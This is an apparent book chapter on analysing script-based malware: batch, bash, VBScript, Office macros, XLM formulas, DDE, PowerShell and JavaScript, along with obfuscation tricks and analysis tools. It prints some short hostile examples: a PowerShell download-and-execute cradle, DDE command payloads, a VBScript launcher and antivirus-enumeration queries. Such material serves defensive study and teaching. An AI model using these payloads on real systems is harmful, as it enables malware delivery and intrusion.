Writing malware nowadays is a business, and, like any business, it aims to be as profitable as possible by reducing development and operational costs. Another strong advantage is being able to quickly adapt to changing requirements and the environment. Therefore, as modern systems become more and more diverse and low-level malware has to be more specific to its task, for basic operations, such as actual payload delivery, attackers tend to choose approaches that work on multiple platforms and require a minimum amount of effort to develop and upgrade. As a result, it is no surprise that scripting languages have become increasingly popular among attackers as many of them satisfy both of these criteria.
In addition to this, the traditional attacker requirements are still valid, such as being as stealthy as possible to successfully achieve malicious goals. If the script interpreter is already available on the target system, then the code will be relatively small. Scripts also help to evade detection: many traditional antivirus engines support binary and string signatures quite well, but properly detecting obfuscated scripts requires a syntax parser or an emulator, which might be costly for the antivirus company to develop and support. All of this makes scripts a perfect choice for first-stage modules.
In this chapter, we will cover the following topics:
Classic shell script languages
All modern operating systems support a command language of some kind, which is generally available through the shell. Their functionality varies from system to system. Some command languages might be powerful enough to be used as full-fledged script languages, while others support only the minimal syntax that is required to interact with the machine. In this chapter, we will cover the two most common examples: bash scripting for Unix and Linux and batch files for the Windows platform.
The Windows batch scripting language was created mainly to facilitate certain administrative tasks and not to completely replace other full-fledged alternatives. While it supports certain programming concepts, such as functions and loops, some quite basic operations, such as string manipulations, might be less obvious to implement compared to many other programming languages. The code can be executed directly from the cmd.exe console interface or by creating a file with the .cmd or .bat extensions. Note that the commands are case insensitive.
The list of supported commands remains quite limited, even today. All commands can be split into two groups, as follows:
Historically, no standard tools were provided to send HTTP requests (now curl has become available on modern versions of Windows) or to compress files. From the attacker’s perspective, this means that to implement more or less basic malware functionality, such as downloading, decrypting, and executing additional payloads, they must write extra code. Only later did system tools such as bitsadmin and certutil become commonly misused by attackers to download and decode the payloads. Here are some examples of how they were used:
In addition, there are a few lesser-known ways that Windows malware can access the remote payload using standard console commands, as follows:
Finally, some standard tools, such as wmic, natively support remote machines, so if credentials are available, it is possible to execute certain commands on another victim’s machine without any extra tools.
More non-standard security-related applications for standard tools can be found on the LOLBAS project page: https://lolbas-project.github.io/.
The most common obfuscation patterns for batch files are as follows:
Figure 10.1 – An example of batch script obfuscation using escape symbols
Figure 10.2 – An example of batch script obfuscation using non-existing variables
The first and second cases can be handled by just printing the results of these operations using the echo command. The third and fourth cases can easily be handled by basic replacement operations, while the fifth case can be handled by just making everything lowercase except for things such as base64-encoded text.
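As a rough illustration of this kind of manual clean-up, the following Python sketch undoes caret escapes and padding with undefined variables (the two patterns shown in Figures 10.1 and 10.2) and optionally lowercases the result. The function name normalize_batch and its parameters are hypothetical, and the regular expressions are a simplification: they ignore quoting rules and delayed expansion (!var!), so the output should be treated as a reading aid rather than an exact emulation of cmd.exe.

```python
import re

VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")


def normalize_batch(line, defined_vars=(), lowercase=True):
    """Undo simple batch obfuscation on one line (static reading aid only)."""
    # cmd.exe treats ^X outside quotes as a plain X, so drop the carets.
    line = re.sub(r"\^(.)", r"\1", line)

    # Inside a batch file, an undefined %name% expands to an empty string.
    # Variables listed in defined_vars are assumed to be real and are kept.
    known = {name.lower() for name in defined_vars}

    def expand(match):
        return match.group(0) if match.group(1).lower() in known else ""

    line = VAR_RE.sub(expand, line)
    return line.lower() if lowercase else line
```

Lowercasing should be switched off (lowercase=False) for lines that carry base64-encoded text, since changing the case would corrupt the encoded data.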
Bash is a command-line interface that is native to the Unix world. It follows the one task, one tool paradigm, where multiple simple programs can be chained together. The shell scripting supports fundamental programming blocks, such as loops, conditional constructs, and functions. In addition to this, it is powered by multiple external tools, most of which can be found on any supported system. Unlike the Windows shell, which relies heavily on built-in commands, many basic functions here are provided by independent programs; even echo, which is used to print a string, exists as a standalone binary in addition to the Bash built-in of the same name. The common file extension for shell scripts is .sh. However, even a file without any extension will be executed properly if the corresponding interpreter is provided in the header; for example, #!/bin/bash. Unlike Windows, here, all commands are case sensitive.
There are many other shells in the Linux world, such as sh or zsh, but their syntax is largely the same.
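When triaging an extensionless sample, the interpreter header is often the quickest hint about which shell it targets. The sketch below, with the hypothetical helper name interpreter_from_shebang, simply parses the first line; it assumes the script text has already been read into a string and does not validate that the interpreter exists.

```python
def interpreter_from_shebang(script_text):
    """Return the interpreter named in a '#!' header, or None if absent."""
    first_line = script_text.splitlines()[0] if script_text else ""
    if not first_line.startswith("#!"):
        return None
    parts = first_line[2:].split()
    if not parts:
        return None
    # '#!/usr/bin/env bash' delegates the lookup to env, so report its argument.
    if parts[0].endswith("/env") and len(parts) > 1:
        return parts[1]
    return parts[0]
```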
As most Linux tools provide only a tiny piece of functionality, the full-fledged attack will involve many of them. However, some of them are used more often by attackers to achieve their goals, especially in mass-infection malware such as Mirai:
Figure 10.3 – An example of Mirai’s shell script
Just like for malware written in any other programming language, obfuscation can be incorporated here to slow down the reverse engineering process and bypass basic signature detection. Multiple approaches are possible in theory, such as dynamically decoding and executing commands, using crazy variable names, or applying sed/awk string replacements. However, it is worth mentioning that modern IoT malware still doesn’t incorporate any sophisticated tricks. This is mainly because the scripts that are used are quite generic and, often, they can only be reliably detected if the corresponding network IOC is known or if the final payload is detected.
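Since detection of such generic scripts often hinges on network IOCs, a first triage step might be to pull URLs and IPv4 addresses out of the script text. The following is a minimal sketch under that assumption; the helper name extract_network_iocs and the regular expressions are illustrative and will miss indicators that are built dynamically at runtime.

```python
import re

URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\"<>|;)]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_network_iocs(script_text):
    """Collect unique URLs and IPv4 addresses that appear literally in a script."""
    urls = sorted(set(URL_RE.findall(script_text)))
    # Keep only dotted quads whose octets are all in the 0-255 range.
    ips = sorted({
        ip for ip in IPV4_RE.findall(script_text)
        if all(int(octet) <= 255 for octet in ip.split("."))
    })
    return {"urls": urls, "ipv4": ips}
```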
That’s pretty much everything we need to know about shell scripts. Now, it’s time to talk about full-fledged programming languages. In particular, let’s start with Microsoft Visual Basic Scripting Edition (VBScript)-based threats.
VBScript was the first mainstream programming language embedded into Windows OS. It has been actively used by system administrators to automate certain types of tasks without the need to install any third-party software. Available on all modern Microsoft systems, it gradually became a popular choice for malware writers who were looking for a guaranteed way of performing certain actions without any need to recompile the associated code.
At the time of writing, Microsoft has decided to switch to PowerShell to handle administrative tasks and has left all future VBScript support to the ASP.NET framework. So far, there are no plans to discontinue it in future Windows releases.
The native file extension for VBScript files is .vbs, but it is also possible to encode them into files using a .vbe extension. Additionally, they can be embedded into Windows script files (.wsf) or HTML application (.hta) files. .vbs, .vbe, and .wsf files can be executed either by wscript.exe, which provides the proper GUI, or cscript.exe, which is the console alternative. .hta files can be executed by the mshta.exe tool. VBScript code can also be executed directly from the command line using the mshta vbscript:<script_body> syntax.
Initially, this technology was intended to be used by web developers and this fact drastically affected the syntax. VBScript is modeled on Visual Basic and has similar programming elements, such as conditional structures, loop structures, objects, and embedded functions. Data types are slightly different to work with: for example, all variables in VBScript have the Variant type by default.
Most of this high-level functionality can be accessed in the corresponding Microsoft Component Object Model (COM) objects. COM is a distributed system for creating and interacting with software components.
Here are some COM objects and the corresponding methods and properties that are often misused by attackers:
So, how can all this information be used when we’re performing an analysis? Here is a simple example of code executing another payload:
Dim Val
Set Val = WScript.CreateObject("WScript.Shell")
Val.Run """C:\Temp\evil.vbe"""
As you can see, once the object has been created, its method can be executed straight away. Among native methods, the following can be used to execute expressions and statements:
Additionally, it is relatively straightforward to work with Windows Management Instrumentation (WMI) using VBScript. WMI is the infrastructure for managing data on Windows systems that gives access to various information, such as numerous system properties or a list of installed antivirus products. These are all potentially interesting to attackers.
Here are two ways it can be accessed:
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService = objLocator.ConnectServer(".", "root\cimv2")
objService.Security_.ImpersonationLevel = 3
Set Jobs = objService.ExecQuery("SELECT * FROM AntiVirusProduct")
strComputer = "."
Set oWMI = GetObject("winmgmts:\\" & strComputer & "\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("SELECT * from AntiVirusProduct")
Now, let’s talk about what tools we can use to facilitate the analysis.
The once-supported Microsoft Script Debugger was replaced by Microsoft Script Editor, which was distributed as part of MS Office up to its 2007 edition and was later discontinued:
Figure 10.4 – The Microsoft Script Editor interface
For basic static analysis, a generic text editor that supports syntax highlighting might be good enough. For dynamic analysis, it is highly recommended to use Visual Studio. Even the free community edition provides all the necessary functionality to do this in a very efficient way. To start the debugging process, first, you may wish to just execute the script the following way:
cscript.exe /x evilscript.vbs
However, for most people, it won’t work straight away. Before that, you will need to make sure your IDE is registered as a JIT debugger. To do this for Visual Studio, go to its Tools | Options... | Debugging | Just-In-Time settings and check that the Script tick is set:
Figure 10.5 – Registering Visual Studio as the JIT debugger for VBScript
After this, executing the aforementioned cscript command will automatically start suggesting that you use Visual Studio for debugging:
Figure 10.6 – cscript suggesting Visual Studio for VBScript debugging
Once confirmed, everything is ready for you to start dynamic analysis:
Figure 10.7 – Debugging the VBScript file in Visual Studio
While it is relatively straightforward to encode the .vbs file into .vbe using the EncodeScriptFile method provided by the Scripting.Encoder object, there is no native tool to decode the .vbe scripts back to .vbs, as that would defeat the purpose of encoding:
Figure 10.8 – The original and encoded VBScript files
However, there are several open source projects available that aim to solve this problem; for example, the decode-vbe.py tool by Didier Stevens.
When analyzing the code, it makes sense to pay particular attention to the following operations:
Finally, let’s talk about obfuscation and how to handle it.
Quite often, VBS obfuscation utilizes pretty basic techniques, such as adding garbage comments or using strings that require character replacement before they can be used. Syntax highlighting appears to be quite useful when analyzing such files.
Another common example is building a second-stage payload from the embedded data, such as from an array of integers, and then executing it dynamically, as shown in the following screenshot:
Figure 10.9 – VBScript malware dynamically builds a second-stage payload
One of the easiest ways to convert it into the actual code is to use a great online tool called CyberChef:
Figure 10.10 – The second stage of the VBScript malware after decoding
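The same conversion can also be scripted offline. The sketch below assumes that the payload is stored as an Array(...) literal of decimal character codes, optionally shifted by a constant; the function name decode_int_array and the offset parameter are hypothetical, and real samples may use other containers or arithmetic that would need to be adapted.

```python
import re


def decode_int_array(script_text, offset=0):
    """Decode the first Array(...) of decimal integers into text."""
    match = re.search(r"Array\s*\(([^)]*)\)", script_text, re.IGNORECASE)
    if match is None:
        raise ValueError("no Array(...) literal found")
    numbers = [int(token) for token in re.findall(r"-?\d+", match.group(1))]
    # Subtract the (assumed) constant shift before mapping codes to characters.
    return "".join(chr(number - offset) for number in numbers)
```

The decoded text is only returned as a string, never executed, so it can be reviewed safely in a text editor.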
Once you have the actual functional code, the easiest way to handle it is to search for the functions you are most interested in (the ones that we previously listed) and check their parameters to get information about dropped or exfiltrated files, executed commands, accessed registry keys, and the C&C servers that the malware connects to. If the obfuscation layer makes the functionality completely obscure, then it is necessary to keep track of the variables in which the next-stage script is accumulated. You can iterate through the layers one by one, printing or watching these variables to get the next block’s functionality until the main block of code becomes readable.
Now that we’ve learned about VBScript, let’s talk about a slightly different topic – macros and the threats that rely on them.
While many loud malware attacks were related to exploited vulnerabilities, humans remain the weakest link in the defense chain. Social engineering techniques can allow malicious actors to successfully execute their code without creating or buying complicated exploits.
Since many organizations now provide cybersecurity training for all newcomers, many people know basic things, such as that it is unsafe to click on links or executable files received by various means from outside of the organization or the group of people that you know. Therefore, the attackers have to invent new ways to trick users, and documents containing malicious macros are a great example of these ongoing efforts.
MS Office macros incorporate the Visual Basic for Applications (VBA) programming language. This is derived from Visual Basic 6, which was discontinued a long time ago. VBA survived and was later upgraded to version 7. Normally, the code can only run within a host application, and it is built into most Microsoft Office applications (even for macOS).
VBA is a dialect of Visual Basic and inherited its syntax. VBScript can be considered as a subset of VBA with a few simplifications, mainly caused by different application models. The same elements need to be paid attention to when analyzing VBA objects:
The list of COM objects that are of interest to attackers is also the same as for VBScript. The only difference is that some functionality can be accessed without creating objects; for example, through the Shell function.
To ensure that it will be executed automatically, malware must use one of the standard function names that will define when it should happen. These names are slightly different for different MS Office products. Here are the most commonly misused ones:
Here is an example of Document_Open being used for this purpose:
Figure 10.11 – A malicious VBA macro registering the Document_Open routine to achieve execution
Malware can also install dedicated handlers so that it can be executed later under some condition, for example, using the Application.OnSheetActivate function.
MS Office has its own auto-start directories that are commonly misused by malware to achieve persistence. They do this by placing their code there. Here are the standard ones for different products and versions:
Apart from that, persistence can be achieved by manipulating global macro files:
Now, let’s talk about what tools can help us analyze malicious macros.
Unlike VBScript, VBA has a native editor in MS Office that can be accessed from the Developer tab, which is hidden by default. It can be enabled in Word Options in the Customize Ribbon menu:
Figure 10.12 – Enabling the VBA macro editor in MS Office options
It supports debugging the code in this way, making both static and dynamic analysis relatively straightforward.
Another tool that can extract macros from documents is OfficeMalScanner, when executed with the info command-line argument. Apart from this, the previously mentioned tools from the oletools project (especially olevba) and oledump can be used to extract and analyze VBA macros as well. If the engineer wants to work with p-code instead of source code for some reason, the pcodedmp project aims to provide the required functionality.
Finally, ViperMonkey can be used to emulate some VBA macros and, in this way, help handle obfuscation.
XLM macros, also known as formulas, are a 30-year-old feature of Microsoft Excel that suddenly gained popularity among attackers recently. An example of it is a SUM function, which is commonly used to automatically calculate a sum of numbers spread across multiple cells. While some of them may be dangerous out of the box, such as EXEC, which allows for arbitrary command execution, in most cases, attackers chain many benign ones to implement malicious functionality.
Here are some examples of commonly misused formulas in the final deobfuscated payload:
Another option similar to the CALL option is REGISTER.
An obvious example of a simple malicious payload utilizing them would be calling APIs such as URLDownloadToFile and ShellExecuteA to deliver and execute the next stage of the payload.
But in reality, pretty much all modern malicious macros will be obfuscated and will use a different set of macros to build the actual malicious functionality. We are going to cover them here. For .xls documents following the Compound File Binary (CFB) structure (more information can be found in Chapter 8, Handling Exploits and Shellcode), the workbook data is stored in the Binary Interchange File Format, version 8 (BIFF8). Microsoft Excel doesn’t provide full functionality to edit it, so malware analysts may need to use dedicated tools to revert some of the changes that are made by the attackers to hide the content. For both .xlsb and .xlsm OOXML-based Excel documents, the corresponding data can generally be found in the xl/macrosheets directory in BIFF12 and XML formats, respectively.
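Because OOXML documents are ZIP archives, the macro sheet parts can be located without opening the file in Excel. The following sketch lists the archive members stored under xl/macrosheets/; the function name list_macrosheets is hypothetical, and the code assumes that the document bytes are already in memory and that the archive is not encrypted.

```python
import io
import zipfile


def list_macrosheets(ooxml_bytes):
    """Return archive members stored under xl/macrosheets/ (files only)."""
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.lower().startswith("xl/macrosheets/")
            and not name.endswith("/")
        )
```

An empty result does not prove that the document is clean; it only means that no parts were found at this conventional location.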
Finally, the same as in VBA macros, formulas can use some particular standard cell names to achieve autorun capabilities. An example would be the cell starting with the Auto_Open prefix:
Figure 10.13 – The cell with the XLM macro that will be automatically executed
Now, let’s talk about how XLM-based payloads can be obfuscated.
There are multiple ways attackers may attempt to complicate the work of reverse engineers trying to figure out malware’s purpose. Let’s explore the most common of them:
Figure 10.14 – Unhiding hidden sheets in Excel
Figure 10.15 – Changing the hsState field associated with a veryhidden sheet
Figure 10.16 – Changing the fHidden field to unhide the associated name
These are the most common obfuscation techniques. Finally, let’s see what tools can help us with the analysis.
First of all, the already mentioned olevba tool can be used to automatically extract XLM macros as well. If another tool called XLMMacroDeobfuscator is also installed on the same system, the output of olevba will also be nicely deobfuscated:
Figure 10.17 – Extracted and deobfuscated chain of XLM macros
Apart from that, Microsoft Excel provides great embedded capabilities for debugging formulas. Mainly, its Name Manager and Macro Debugger parts will be particularly useful:
Figure 10.18 – Dynamic analysis of a chain of XLM macros using Excel’s debugger
Finally, the BiffView and OffVis tools can provide an intimate view of BIFF8 internals. OffVis can also help bypass some of the aforementioned obfuscation techniques that involve hiding sheets and names.
That’s it for XLM macros. We have already learned a lot about macro-based threats, so now, it is time to cover other ways in which malware may achieve its goals by misusing MS Office documents.
There are other methods that attackers may use to execute code once the document is opened. One approach is to use the mouse click/mouse over technique, which involves executing a command when the user clicks on a crafted object in PowerPoint or moves the mouse over it.
This can be done by assigning the corresponding action to it, as follows:
Figure 10.19 – Adding an action to an object in PowerPoint
The good news is that updated versions of Microsoft Office should have a protected view (read-only access) security feature enabled, which will warn a user about a potential external program’s execution if the document came from an unsafe location. In this case, it will be all about social engineering – whether the attacker succeeds in convincing the victim to ignore or disable all warnings.
Another less common way in which malware may achieve execution is by using Setting Content files. These are XML-based files that can be executed on their own (with a .SettingContent-ms file extension) or embedded into other documents. The DeepLink tag can be used there to specify the command to be executed. After the first few attempts to misuse this functionality, Microsoft promptly beefed up the security of this feature. Now, we don’t see malware targeting it much.
Finally, the Dynamic Data Exchange (DDE) functionality can also be used to execute malicious commands. One way it can do this is by adding a DDEAUTO field with the command to execute, specified as the argument. Another way this functionality can be misused is by using particular syntax in Microsoft Excel. In this case, a malicious file will contain the command crafted in the following way:
(+|-|=)<command_to_execute>|'<optional_arguments_prepended_by_space>'!<row_or_column_or_cell_number>
Alternatively, the command can be passed as an argument to a built-in benign function such as SUM. Here are some example payloads that execute calc.exe after the user’s confirmation:
=calc|' '!A
+cmd|' /c calc.exe'!7
@SUM(calc|' '!Z99)
Here is an example of the warning message that’s displayed by Microsoft Excel when this technique is used:
Figure 10.20 – An example of a Microsoft Excel warning box related to potential code execution
The msodde tool (part of oletools) may help in detecting such techniques in samples.
While any code execution here will require user confirmation before being enabled, it remains a possible attack vector with the help of social engineering.
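For quick triage of extracted cell contents (for example, from a CSV export), the Excel DDE syntax described earlier can be approximated with a regular expression. This is only a sketch under that assumption: the names DDE_RE and find_dde are hypothetical, the pattern is deliberately loose, and a dedicated tool such as msodde remains the more reliable option.

```python
import re

# Approximates: <command>|'<arguments>'!<row_or_column_or_cell>
DDE_RE = re.compile(r"([\w.\\:]+)\|'([^']*)'!(\w+)")


def find_dde(cell):
    """Return (command, arguments) if the cell looks like a DDE payload, else None."""
    text = cell.strip()
    # Only cells that Excel would evaluate as formulas are of interest here.
    if not text or text[0] not in "=+-@":
        return None
    match = DDE_RE.search(text)
    if match is None:
        return None
    return match.group(1), match.group(2).strip()
```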
Now that we’ve mastered macro-based threats, it is time to talk about another scripting language commonly misused by attackers these days – PowerShell!
PowerShell represents an ongoing evolution of Windows shell and scripting languages. Its powerful functionality, access to .NET methods, and deep integration with recent versions of Windows have drastically increased its popularity among both regular users and malicious actors. From the attacker’s point of view, it has many other advantages, especially in terms of obfuscation, which we are going to cover in great detail. Additionally, because the whole script can be encoded and executed as a single command, it requires no script files to hit the hard disk and leaves minimal traces for forensic experts.
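When a script is passed this way through the -EncodedCommand argument, the value is the base64 encoding of the script text in UTF-16LE. A minimal decoding sketch follows; the function name decode_encoded_command is hypothetical, and the code assumes that the base64 value has already been isolated from the command line.

```python
import base64


def decode_encoded_command(b64_text):
    """Recover the script text from a PowerShell -EncodedCommand value."""
    raw = base64.b64decode(b64_text)
    # powershell.exe expects the encoded script to be UTF-16LE text.
    return raw.decode("utf-16-le")
```

The function only returns the text, so the recovered script can be inspected statically without being run.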
Let’s start with the peculiarities of its syntax.
PowerShell command-line arguments provide unique opportunities for the attackers because of certain characteristics of their implementation. For example, PowerShell understands even truncated arguments and the associated parameters, so long as they are not ambiguous. Let’s go through some of the most common values that are used when executing the malicious code:
In the preceding examples, the command-line arguments can be truncated to any number of letters and still be valid for PowerShell. For example, -NoProfile and -NoProf, or Hidden and Hidde, will be processed in the same way.
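To normalize such truncated arguments during analysis, a simple prefix lookup is often enough. The sketch below is an approximation: KNOWN_PARAMETERS is a partial, assumed list of powershell.exe parameters, expand_abbreviation is a hypothetical helper, and the real parser applies its own rules for some short forms (for instance, -e is commonly seen in place of -EncodedCommand), so more than one candidate here does not necessarily mean that PowerShell would reject the argument.

```python
# Partial list of powershell.exe parameters, assumed for illustration.
KNOWN_PARAMETERS = [
    "Command", "EncodedCommand", "ExecutionPolicy", "File",
    "NoExit", "NoLogo", "NonInteractive", "NoProfile", "WindowStyle",
]


def expand_abbreviation(token, known=KNOWN_PARAMETERS):
    """Return every known name that the (possibly truncated) token could mean."""
    prefix = token.lstrip("-/").lower()
    if not prefix:
        return []
    # Matching is case-insensitive, mirroring how PowerShell treats arguments.
    return [name for name in known if name.lower().startswith(prefix)]
```

The same helper can be reused for argument values by passing a different list, for example the window styles Normal, Minimized, Maximized, and Hidden.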
Regarding the syntax, let’s look at some commands that are often misused by attackers.
Native cmdlets:
.NET-based methods:
Each of these methods has an async version as well, with the corresponding name suffix (such as DownloadStringAsync).
For .NET namespaces, the System. prefix can be safely omitted, as follows:
Figure 10.21 – An example of a Veil payload
As we can see, using a combination of compression and base64 encoding is a very popular technique among attackers to store the next stage payload and, in this way, complicate the analysis and detection. We will talk about other obfuscation techniques in greater detail in the next section. Here is an example of the code downloading the payload and executing it:
iex(new-object net.webclient).downloadstring('http://<url>/payload.bin')
Just like command-line arguments, the method names can be truncated without creating ambiguity. The Get-Command/gcm command with wildcards can be used by the analyst to identify the full name and can also be used by attackers to dynamically resolve them.
PowerShell can also be used to execute custom .NET code. In particular, the Add-Type -TypeDefinition <variable_storing_source_code> syntax can be used to dynamically compile .NET source code directly in the PowerShell script so that it can be used straight away. The csc.exe tool will be used behind the scenes for this purpose.
The notorious PowerShell-based Bluwimps stores information in WMI management classes. This makes it harder to detect using traditional antivirus solutions, and it can remotely execute code using the Windows Management Instrumentation Command-line (WMIC) tool instead of utilizing the more widely used psexec tool.
There are multiple open source tools available online that can generate and/or obfuscate PowerShell-based payloads for penetration testing. This list includes, but is not limited to, the following:
As we know, PowerShell commands are executed through the Windows console, so pretty much any obfuscation technique we described previously can be applied here as well. In addition to this, several other simple obfuscation tricks have proved to be popular:
iex (<value_with_separators>.split("<separator>") -join "") | iex
In terms of encryption, the following approaches have proved to be popular:
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(<secure_string>))
For this cmdlet, the decryption key can be provided in either a -key or a -securekey argument (or perhaps something like -kE).
To handle them, you must successfully identify the algorithm that’s being used and then reverse the logic using the information available. Writing simple scripts using your language of preference is one option, but in many cases, the same result can be achieved faster using the online CyberChef tool.
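As an example of such a simple script, here is a sketch for one of the most basic cases, a repeating-key xor. It assumes that the encrypted bytes have already been extracted from the sample; the helper names xor_bytes and guess_single_byte_key are hypothetical, and the brute-force helper only works when the key is a single byte and a fragment of the expected plaintext (such as http) is known.

```python
def xor_bytes(data, key):
    """Apply a repeating-key xor; the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def guess_single_byte_key(data, marker):
    """Try all 256 one-byte keys and return the first that reveals the marker."""
    for key in range(256):
        if marker in xor_bytes(data, bytes([key])):
            return key
    return None
```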
Let’s talk about what other tools we can use to facilitate the analysis.
PowerShell has a powerful embedded help tool that can be used to get the description of any command. It can be obtained by executing a Get-Help <command_name> statement:
Figure 10.22 – Getting a description for a PowerShell command
Overall, deobfuscation and decoding operations mainly require only a basic set of skills, such as how to decode base64, how to decompress deflate and gzip, how to remove meaningless characters, how to replace variables, and how to read partially written commands. Any text editor with the corresponding syntax highlighting can be used for static analysis in this case.
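The base64 and decompression steps can be combined in a few lines. The sketch below assumes that the blob is base64 text wrapping gzip, zlib, or raw deflate data (the latter being what .NET's DeflateStream produces); the function name decode_compressed_blob is hypothetical, and other encodings or additional layers would need extra handling.

```python
import base64
import zlib


def decode_compressed_blob(b64_text):
    """Base64-decode a blob, then decompress it as gzip, zlib, or raw deflate."""
    raw = base64.b64decode(b64_text)
    # MAX_WBITS | 32 lets zlib auto-detect gzip and zlib headers;
    # a negative value tells it to expect a headerless (raw) deflate stream.
    for wbits in (zlib.MAX_WBITS | 32, -zlib.MAX_WBITS):
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            continue
    raise ValueError("not gzip, zlib, or raw deflate data")
```

The result is returned as bytes because the next stage is not always text; decoding it (for example, as UTF-8 or UTF-16LE) is left to the analyst.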
While xor can be decrypted in multiple ways, the easiest way to handle embedded PowerShell encryption is through dynamic analysis in the PowerShell Integrated Scripting Environment (ISE). In this case, the code to dump the decrypted string on a disk is added straight after the decryption block. For this purpose, the Set-Content, Add-Content, and Out-File cmdlets, along with the pipe symbol (|) or classic > and >> output redirects, can be used:
powershell -c "$a='secret'; $a | set-content 'output.txt'"
Alternatively, the Write-Host cmdlet can be used to write the decrypted output to the console and then redirect it to a file. Finally, a great tool called PSDecode can be used to quickly try to handle obfuscation automatically (this may involve code execution, so use it with care).
Now, it is time to talk about JavaScript-based threats.
JavaScript is a web language that powers billions of pages on the internet, so it is no surprise that it is commonly used to create exploits that target web users. However, on Windows, it is also possible to execute JScript (a very similar dialect of ECMAScript) files through Windows Script Host, which also makes it a good candidate for malicious attachments and post-compromise scripting. For example, a fileless threat called Poweliks uses JScript code stored in the registry to achieve system persistence without leaving separate files on a disk.
Since there are minor differences between JavaScript and JScript, here, we will cover syntax that is common to both of them. Additionally, starting from this moment, we will use the JavaScript notation.
The universal file extension for JavaScript files is .js; encoded JScript files have the .jse extension. Additionally, they can be embedded into .wsf and .hta files in the same way as VBScript. Similarly to VBScript, on Windows, both .js/.jse and .wsf files can be executed locally by wscript.exe and cscript.exe, while .hta files are executed by mshta.exe. There are several ways to execute inline JavaScript scripts:
mshta javascript:<script_body>
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";<script_body>
In addition to this, on Windows, it is possible to execute JavaScript code using regsvr32.exe as a COM scriptlet (.sct files). On Linux, multiple options are available for executing JavaScript files from the console, such as phantomjs, and, of course, the JavaScript code can be executed in full-fledged browsers. We will cover this in more detail in the Static and dynamic analysis section.
If the script is going to be executed locally, particular attention should be paid to certain types of operations that can answer questions about its purpose, persistence mechanism, and communication protocol. As with VBScript, on Windows, the same COM objects described previously can be used for this purpose:
Figure 10.23 – An example of JavaScript code writing data to a file on Windows
On Linux, JavaScript is rarely used to execute commands locally, as this requires a dedicated runtime, such as Node.js, which may not be available on the target system.
In terms of web applications, the following functions need to be paid attention to:
Code execution:
eval: Execute a script block provided as an argument
Page redirects:
There are multiple options here, as shown in the following code block:
Important note
The window. part can commonly be omitted.
Important note
There are also possible derivatives for them, similar to the window.location-based techniques mentioned previously.
Apart from that, there is also another way to redirect the user without using JavaScript:
External script loading:
Web requests to remote machines:
Popular libraries such as jQuery and custom implementations of asynchronous JavaScript and XML (Ajax) usually utilize XMLHttpRequest and sometimes fetch requests behind the scenes.
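A quick way to decide where to start reading a large script is to count the occurrences of the functions and objects mentioned in this section. The following sketch does this with regular expressions; the SINKS table and the triage_javascript helper are hypothetical, the patterns cover only a handful of names (eval, document.write, window.location, XMLHttpRequest, and fetch), and anything hidden behind obfuscation will not be matched.

```python
import re

# Category -> patterns for a few functions and objects worth reviewing first.
SINKS = {
    "code execution": [r"\beval\s*\("],
    "document update": [r"\bdocument\s*\.\s*write(?:ln)?\s*\("],
    "page redirect": [r"\b(?:window\s*\.\s*)?location\b"],
    "web request": [r"\bXMLHttpRequest\b", r"\bfetch\s*\("],
}


def triage_javascript(source):
    """Count literal uses of interesting functions, grouped by category."""
    hits = {}
    for label, patterns in SINKS.items():
        count = sum(len(re.findall(pattern, source)) for pattern in patterns)
        if count:
            hits[label] = count
    return hits
```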
The most common JavaScript obfuscation technique, employed with some variations, is dynamically building the next layer of JavaScript code, either by decrypting it or by assembling it from integers. The resulting code is then executed using the eval function or injected into the page using document.write:
Figure 10.24 – Obfuscated JavaScript-based threat
However, several other techniques are widely used by malware authors:
window['console']['log'] = <other_function>;
Alternatively, it is possible to redefine the function as follows:
var console = {};
console.log = <other_function>;
There are other techniques as well, but these are used in malware most often.
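Bracket-style property access such as window['console']['log'] is easier to read once it is rewritten in dot notation. The sketch below performs this rewrite with a regular expression; the names BRACKET_RE and brackets_to_dots are hypothetical, and the pattern only handles plain quoted identifiers, so keys built through concatenation or escape sequences are left untouched.

```python
import re

# A quoted identifier in brackets that directly follows a name, ']' or ')'.
BRACKET_RE = re.compile(
    r"""(?<=[\w$\])])\[\s*(['"])([A-Za-z_$][A-Za-z0-9_$]*)\1\s*\]"""
)


def brackets_to_dots(source):
    """Rewrite obj['name'] as obj.name where 'name' is a valid identifier."""
    return BRACKET_RE.sub(lambda match: "." + match.group(2), source)
```

The lookbehind keeps array literals such as ['a'] intact, since they do not follow an object expression.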
With web development on the rise, there are plenty of tools that exist for analyzing and debugging JavaScript code – from basic text editors with syntax highlights to quite sophisticated packages. However, the developer’s use cases are quite different from the reverse engineer’s, which eventually determines which set of programs are used by them.
First of all, to speed up the analysis, it makes sense to reformat the existing JavaScript code so that it is easier to follow the logic. Multiple tools, such as jsbeautifier, serve this purpose, and some of them also contain basic unpacking and deobfuscation logic.
In terms of generic dynamic analysis, embedded browser toolsets such as Chrome Developer Tools and Firefox Developer Tools are extremely handy. To use them, a small HTML block needs to be written to load the JavaScript file of interest.
Here, the JavaScript code is embedded into the page itself:
Figure 10.25 – An example of the embedded JavaScript code in Chrome Developer Tools
Here is an externally loaded JavaScript file in Firefox:
Figure 10.26 – An example of the external JavaScript script in Firefox Developer Tools
In addition to this, several customized tools implement the functionality required for malware analysis. One of them is Malzilla; this free toolset combines multiple smaller tools that aim to make analysis easier by implementing the most common operations required. While relatively old, it is still used by many malware analysts to quickly go through obfuscation layers and extract the actual functionality.
The most commonly used functionality of Malzilla is the module that can intercept the eval call and output its argument to the screen. This is an extremely useful feature as most obfuscation techniques build up the actual payload before executing it using this function. This means that this is the point where the decrypted or deobfuscated logic becomes available, sometimes after a few iterations. It also includes various smart decoders that drastically speed up the analysis:
Figure 10.27 – Malzilla decoders
